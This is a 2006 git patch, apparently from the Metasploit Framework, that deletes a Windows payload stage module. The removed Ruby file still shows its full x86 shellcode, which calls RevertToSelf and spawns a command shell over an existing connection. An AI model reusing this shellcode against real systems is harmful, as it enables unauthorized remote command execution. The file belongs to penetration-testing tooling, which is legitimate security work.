From b011d080b389f852de8678338e583df64ea0f31f Mon Sep 17 00:00:00 2001
From: vlad902 <>
Date: Sun, 8 Jan 2006 03:26:41 +0000
Subject: [PATCH] No stagers can use this

git-svn-id: file:///home/svn/incoming/trunk@3344 4d416f70-5f16-0410-b530-b9f4589650da
---
.../payloads/stages/windows/shell_revert.rb | 49 -------------------
1 file changed, 49 deletions(-)
delete mode 100644 modules/payloads/stages/windows/shell_revert.rb

diff --git a/modules/payloads/stages/windows/shell_revert.rb b/modules/payloads/stages/windows/shell_revert.rb
deleted file mode 100644
index 28efffe729..0000000000
--- a/modules/payloads/stages/windows/shell_revert.rb
+++ /dev/null
@@ -1,49 +0,0 @@
-require 'msf/core'
-
-module Msf
-module Payloads
-module Stages
-module Windows
-
-module Shell
-
- include Msf::Payload::Windows
-
- def initialize(info = {})
- super(merge_info(info,
- 'Name' => 'Windows RevertToSelf Command Shell',
- 'Version' => '$Revision$',
- 'Description' => 'Call RevertToSelf and spawn a command shell',
- 'Author' => 'hdm',
- 'Platform' => 'win',
- 'Arch' => ARCH_X86,
- 'Session' => Msf::Sessions::CommandShell,
- 'PayloadCompat' =>
- {
- 'Convention' => 'sockedi',
- 'SymbolLookup' => 'ebp',
- },
- 'Stage' =>
- {
- 'Offsets' =>
- {
- 'EXITFUNC' => [ 103 + 28, 'V' ]
- },
- 'Payload' =>
- "\xe8\x09\x00\x00\x00\x41\x44\x56\x41\x50\x49\x33\x32\x00\xff\x55" +
- "\x08\x50\x68\x2a\xc8\xde\x50\xff\x55\x04\xff\xd0" +
- "\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24\xac\x6a" +
- "\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66\xc7" +
- "\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c\x24" +
- "\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x53" +
- "\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89\xe6" +
- "\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff\xff" +
- "\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31\xdb" +
- "\x53\xff\xd0"
- }
- ))
- end
-
-end
-
-end end end end